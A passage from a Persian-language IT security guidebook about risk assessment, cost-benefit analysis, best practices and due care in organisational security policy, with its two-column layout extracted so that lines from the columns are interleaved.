‫ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﺳﺖ ﺁﻳﺪ‪ .‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﺎ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ‬
‫ﺑﺎﻳــﺪ ﭘــﺬﻳﺮﻓﺖ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻳــﻚ ﺗﺤﻠﻴــﻞ ﺳــﻮﺩ ﻭ ﺯﻳــﺎﻥ ‪-‬‬
‫ﻛــﺎﻓﻲ ﺩﺭ ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻠــﻲ ﻭ ﺗــﻀﻤﻴﻦ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑــﺮﺍﻱ‬
‫ﺗﺨﺼﻴﺺ ﻫﺰﻳﻨﻪ ﺑﻪ ﻫﺮ ﺯﻳﺎﻥ ﺍﺣﺘﻤﺎﻟﻲ؛ ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﻧﺰﺩﻳـﻚ ﺷـﻮﻳﻢ‪ .‬ﺍﻳﺠـﺎﺩ‬
‫ﺁﻥ‪ ،‬ﺗﻌﻴﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻫﺮ ﻣﺨﺎﻃﺮﻩ‪ ،‬ﻭ ﺳﭙﺲ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ‬
‫ﺍﻋﺘﻤــﺎﺩ ﻛــﺎﻓﻲ ﺩﺭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣــﺴﺘﻠﺰﻡ ﺗﻔﻜــﺮ ﻭ‬
‫ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺸﺘﺮ ﺍﺳـﺖ ﻳـﺎ ﻧـﻪ ‪-‬‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺩﻗﻴـﻖ ﺍﺳـﺖ‪ .‬ﺗـﺼﻤﻴﻤﺎﺕ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺍﺗﺨـﺎﺫ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻋـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺑﻮﺟـﻮﺩ‬ ‫ﮔﺮﺩﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻮﺻـﻴﻪﻫـﺎﻱ ﺗﺨﺼـﺼﻲ‬
‫ﻼ ﻋﻠﻤﻲ ﻭ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ‬ ‫ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻓﺮﺁﻳﻨﺪ ﻛﺎﻣ ﹰ‬ ‫ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪:‬‬
‫ﺑﻴﺎﻳﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﻛﻨﺎﺭ ﻫﻢ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺍﻳـﻦ ﺍﻋـﺪﺍﺩ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ‪ ،‬ﺩﺍﻧﺸﮕﺎﻩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﺑﺰﺭﮔﺘﺮ ﻛﺎﺭ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ ﻭ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ ﻧﻴﺰ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺑﺎ ﺑﺨﺸﻬﺎﻱ ﻣﻤﻴﺰﻱ ﺩﺍﺧﻠـﻲ ﻳـﺎ‬
‫ﺗﻨﻬﺎ ﺍﻋـﺪﺍﺩ ﻏﻴﺮﺩﻗﻴـﻖ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺑـﻪ ﺗﻮﺍﻧـﺎﻳﻲ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺷﺮﻛﺖ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻤﻜﻬﺎﻱ ﻻﺯﻡ ﺍﺭﺗﺒـﺎﻁ‬
‫ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳﻚ ﺩﺍﺭﺍﺋﻲ‪ ،‬ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ‬
‫ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ )ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﺣﻬﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ‬
‫ﻣﺨﺎﻃﺮﻩ ﺑﺮﺍﻱ ﺁﻥ ﺩﺍﺭﺍﺋﻲ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ‬
‫ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻳﺪ(‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺎ ﻣﺮﺍﺟﻌـﻪ ﺑـﻪ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻣﺤﺎﺳﺒﻪ ﺗﺄﺛﻴﺮ ﺑﺎﻟﻘﻮﺓ ﻫﺮ ﺍﻧﺘﺨﺎﺏ‬
‫ﻣﻨﺎﺑﻊ ﻣﻌﺮﻓﻲﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ‪ ،‬ﺩﺭ ﺧﺼﻮﺹ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫‪ -‬ﺷﺎﺧﺼﻬﺎﻳﻲ ﻛﻪ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺁﻧﻬـﺎ ﺑـﺴﻴﺎﺭ ﺩﺷـﻮﺍﺭ ﺍﺳـﺖ ‪-‬‬
‫ﻣﻄﺎﻟــﺐ ﺑﻴـﺸﺘﺮﻱ ﺑﻴﺎﻣﻮﺯﻳـﺪ‪ .‬ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺨﻮﺍﻫﻴــﺪ ﺍﺯ ﻳــﻚ‬
‫ﺑــﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﭼﮕﻮﻧــﻪ ﻣﺨــﺎﻃﺮﺓ ﻳـﻚ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﻪ ﺧﻮﺍﻫــﺪ‬
‫ﻣﺆﺳﺴﺔ ﻣﺸﺎﻭﺭ ﻃﻠﺐ ﻫﻤﻜﺎﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺗﻮﺍﻧﺴﺖ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ ﻣﺤﺎﺳﺒﻪ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤٨‬‬

‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺍﺧﺒﺎﺭ ﺟﺪﻳﺪ ﻛﻢ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺷﺨـﺼﻲ ﻛـﻪ‬ ‫ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﻭ ﻛـﺸﻒ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﻣﺴﺌﻮﻝ ﺑﺮﺭﺳﻲ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺳـﺖ ﺩﺭ ﺳـﻔﺮ‬ ‫ﺟﺪﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪ ،‬ﻳﺎ ﺑﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﻭ ﺍﺻـﻼﺡ ﺁﺳـﻴﺒﻬﺎ‬
‫ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺯ ﺷﻤﺎ ﭘﻴﺸﻲ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬ ‫ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ؟ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺨﻮﺑﻲ ﻣـﻮﺭﺩ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺭﺩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﺍﻳﻤﻦﺗﺮ ﻣﻲﺷـﻮﺩ ﻳـﺎ ﻧـﺎﺍﻣﻦﺗـﺮ؟ ﻭ ﭼﮕﻮﻧـﻪ‬
‫ﺍﻳﻦ ﺗﻔﻜﺮ ﻛﻪ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻳـﺎ ﺑﺎﻳـﺪ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺗﻘﺮﻳﺒﻲ ﻳـﻚ ﻧﻔـﻮﺫ ﻣﻮﻓـﻖ ﺭﺍ ﻣﺤﺎﺳـﺒﻪ ﻣـﻲﻛﻨﻴـﺪ؟‬
‫ﺳﺮﺁﻣﺪﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻨﻨﺪ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻣﻄﺎﻟﻌﺎﺕ ﻋﻠﻤﻲ ﻭ ﺁﻣﺎﺭﻱ ﺍﻧﺪﻛﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣـﺴﺎﺋﻞ‬
‫ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻓﺮﺍﺩ ﺑﻴﺸﻤﺎﺭﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭘﺎﺳـﺦ ﺍﻳـﻦ‬
‫ﺗﻤﺎﻣﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻨﺎﺳﺐ ﻭ ﺑﻪﺻﺮﻓﻪ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺳﺆﺍﻻﺕ ﺭﺍ ﻣﻲﺩﺍﻧﻨﺪ؛ ﺍﻣﺎ ﻣﺤﻘﻘﺎﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﻓـﺮﺍﺩ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬ ‫ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻗﺎﺩﺭ ﺑﻪ ﺗﺨﻤﻴﻦ ﺻﺤﻴﺢ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ‬
‫ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﺯ ﺣﺪﺍﻗﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ؛ ﻭ ﺩﺭ ﻋﻤـﻞ‪ ،‬ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗﻲ ﺭﻭﺵ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ‪ ،‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﻭ ﻳﺎ ﺑﻌﺒﺎﺭﺗﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨﻪ ﻫﻢ ﺧﻮﺩ ﻭﺍﻗﻌـﹰﺎ ﺑﻬﻴﻨـﻪ‬
‫ﺍﺧﻴﺮ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ‬
‫ﻧﻴﺴﺘﻨﺪ!‬
‫ﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ٧٦‬ﻳـﺎ ﻣﺮﺍﻗﺒـﺖ ﺩﻗﻴـﻖ‪ ٧٧‬ﻧـﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺗﻮﺻﻴﺔ ﻣﺎ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺩﻭ ﺭﻭﻳﻜﺮﺩ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ‬ ‫ﺭﻭﻳﻜﺮﺩ ﺷﺎﻣﻞ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‪ ،‬ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ‬
‫ﺳﺮﺁﻣﺪﻱ ﺍﺳﺖ‪ .‬ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺪﻧـﺔ ﻳـﻚ ﻣﺠﻤﻮﻋـﻪ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ‬ ‫ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻣﻌﻤﻮﻝ ﺩﺭ ﺟﻮﺍﻣﻊ ﻣﺤﻘﻘﺎﻥ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺋﻴﺪﺷﺪﻩ ﻛـﻪ‬
‫ﺳﺮﺁﻣﺪﻱ‪ ،‬ﻳﻚ ﻃﺮﺍﺡ ﺁﮔﺎﻩ ﺑﺎﻳـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨـﺪ‪ ،‬ﻭ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﻣﻲﺭﺳـﺎﻧﺪ ﻭ‬
‫ﺑﺮﺍﻱ ﻫﺮ ﺣﺎﻟﺖ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻌﻘﻮﻝ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳـﺪ‪.‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﻣﻌﻘـﻮﻟﻲ ﻛـﺎﻫﺶ ﻣـﻲﺩﻫـﺪ‪ .‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎﻳﺪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺠﺰﺍ ﻗﺮﺍﺭ‬ ‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺭﺍ "ﺑـﺪﻳﻬﻴﺎﺕ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻣﻨﻄﻘـﻲ ﺗـﺪﺍﺑﻴﺮ‬
‫ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳــﻖ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻳﻲ‬ ‫ﺍﻣﻨﻴﺘﻲ" ﺑﺪﺍﻧﻴﺪ‪.‬‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺣﺪﺍﻗﻞ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﻓﻌـﺎﻝ‬
‫ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﻫـﻢ ﻣــﺸﻜﻼﺕ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﺳﺖ‪ .‬ﻣﺘﺼﺪﻳﺎﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻐﻴﻴـﺮﺍﺕ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ‪ ،‬ﺑـﺎ‬
‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻴﭻ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﻭﺻﻠﻪﻫﺎ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻧﺪ‪ ،‬ﻭ ﻣﻨﺘﻈﺮ ﺣﻮﺍﺩﺙ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ‬
‫ﺳﺮﺁﻣﺪﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻣﺤﻴﻄﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﺎﺳﺐ‬
‫ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﺠــﺎﻡ ﺻـﺤﻴﺢ ﺍﻳــﻦ ﻣـﻮﺍﺭﺩ ﻧﻴــﺎﺯ ﺑـﻪ ﺩﺭﻙ ﻋﻤﻴﻘـﻲ ﺍﺯ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﻻﻳﻞ ﻋﻤﻠﻜﺮﺩ ﻧﺎﺻـﺤﻴﺢ ﺁﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﺎﻟﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺒﺎﻫﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺑﻌﺪﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺩﻧﺒـﺎﻝ‬
‫ﺳﺮﺁﻣﺪﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﻚ ﺧﺒﺮﻧﺎﻣﺔ ﺍﺟﺘﻤﺎﻋﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑﻪ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺗـﻀﻤﻴﻦ ﻛﻨـﺪ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺭﻭﺑـﺮﻭ ﻧﺨﻮﺍﻫـﺪ ﺷـﺪ‪ .‬ﺩﺭ ﻏﺎﻟـﺐ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ‬
‫ﺍﺧﺒــﺎﺭ ﺣﻤــﻼﺕ ﺟﺪﻳــﺪ ﻭ ‪ download‬ﻛــﺮﺩﻥ ﻭﺻــﻠﻪﻫــﺎﻱ‬
‫ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺑﺮﺭﺳـﻲ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺍﻣﺎ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﻧﻴـﺰ ﭘﻴـﺮﻭﻱ ﻛﻨﻴـﺪ‪،‬‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺴﺨﻴﺮ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺷﻤﺎ ﺍﺯ ﺷﻴﻮﻫﺎﻱ ﻧﺎﺩﺍﻧﺴﺘﺔ ﺗﺎﺯﻩ ﻭ ﻣﻨﺘﺸﺮﻧﺸﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺣﺎﻝ‬

‫‪76‬‬ ‫‪Best Practices‬‬


‫‪77‬‬ ‫‪Due Care‬‬
‫‪١٤٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷـﻮﺩ ﻛـﻪ‬


‫ﻻ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ‬
‫ﺑﺎﻳﺪ ﺭﺳﻤﹰﺎ ﻣﻮﺭﺩ ﺗﺒﻌﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻳﻚ ﭘﻴﻜﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳـﺖ‪ .‬ﻫـﺪﻑ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ‬
‫ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ ﻧﺤـﻮﺓ ﺻـﺮﻑ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﺗﺠﺎﺭﻱ ﺷـﻤﺎ ﻃـﻮﺭﻱ‬ ‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻧﺒﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺳﺎﻝ ﻣﺨـﺎﻃﺮﺓ ﺑﻴﻤـﻪﻧـﺸﺪﻩﺍﻱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﺰﻳﻨﺔ ﺁﻥ ﺍﺯ ﻳﻚ ﻣﻘﺪﺍﺭ ﻣﺸﺨﺺ ﺑﺎﻻﺗﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ‬
